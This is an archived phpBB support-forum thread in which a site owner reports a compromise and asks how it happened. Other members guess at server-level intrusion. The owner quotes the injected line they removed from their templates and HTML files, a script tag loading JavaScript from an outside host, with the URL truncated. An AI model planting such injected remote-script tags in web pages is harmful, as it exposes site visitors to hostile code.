I've been hacked

This is an archive of the phpBB 2.0.x support forum. Support for phpBB2 has now ended.
Forum rules
Following phpBB2's EoL, this forum is now archived for reference purposes only.
Please see the following announcement for more information: viewtopic.php?f=14&t=1385785
Locked
WoodierMutley
Registered User
Posts: 5
Joined: Sun Apr 30, 2006 12:48 am

I've been hacked

Post by WoodierMutley »

My phpbb has been hacked, I have no idea how it has been done. I was hoping someone here might be able to help me prevent this from happening again. To fix it I have upgraded from version 2.20 to 2.21 and also had to delete a script line out of my alt template in the overall_header.tpl. All htm files on my site also contained this script.

<!-- RC4 --><script type="text/javascript" language="JavaScript" src="http://jsp.systemdoctor.com/functions.j ... "></script><!-- RC5 -->

I am hosting on a Windows server 2003 using mysql.
User avatar
Lumpy Burgertushie
Registered User
Posts: 68549
Joined: Mon May 02, 2005 3:11 am
Contact:

Post by Lumpy Burgertushie »

do you have anything to do with either of those websites?

if not, then I suggest you contact them both to find out why someone is hacking your board and using the scripts from http://systemdoctor.com/ to redirect to that clan site.


you also might inform the people at http://systemdoctor.com/ that their software is being used this way.


I am not sure that phpbb was hacked, it looks like they came in through thte rest of your server, once in your server files, then any program on the server is open to hackers. thre is nothing phpbb can do about that.

robert
I'm baaaaaccckkkk. still doing work on donation basis. PM your needs.

Premium phpBB 3.3 Styles by PlanetStyles.net

I am pleased to announce that I have completed the first item on my bucket list. I have the bucket.
WoodierMutley
Registered User
Posts: 5
Joined: Sun Apr 30, 2006 12:48 am

Post by WoodierMutley »

My site is www.ClanFromUncle.com and the systemdoctor part is nothing to do with me. It seems that my site is mentioned in the script for some sort of tracking purposes.

I am not really trying to say the hack was the fault of phpbb, more saying has anyone got any ideas how it happened. I have spoken to my web host and kind of got a poor response.

I quote their reply "I am sorry to hear that your forum has been compromised.

We recomend that you run a security audit on your forum, and contact the developers to check for any security patches or updates.

In our experience, these type of compromises are usually as a result of exploitable scripting issues, or permission issues."
Dave Bean
Registered User
Posts: 210
Joined: Thu Jul 12, 2001 4:55 am
Location: Denver, Colorado
Contact:

Post by Dave Bean »

You might check with your host and see if other forums on the server have had the same issue. Perhaps the hack was at the server level, not the phpBB level?
Building Internet Communities
www.ColoradoHealth.info
User avatar
Lumpy Burgertushie
Registered User
Posts: 68549
Joined: Mon May 02, 2005 3:11 am
Contact:

Post by Lumpy Burgertushie »

never heard of this type of hack at all.

but that script seems to just be redirecting people to your clan site. why would a hacker do something like that.

It looks like someone with access to your board did this for some reason.

robert
I'm baaaaaccckkkk. still doing work on donation basis. PM your needs.

Premium phpBB 3.3 Styles by PlanetStyles.net

I am pleased to announce that I have completed the first item on my bucket list. I have the bucket.
Locked

Return to “2.0.x Support Forum”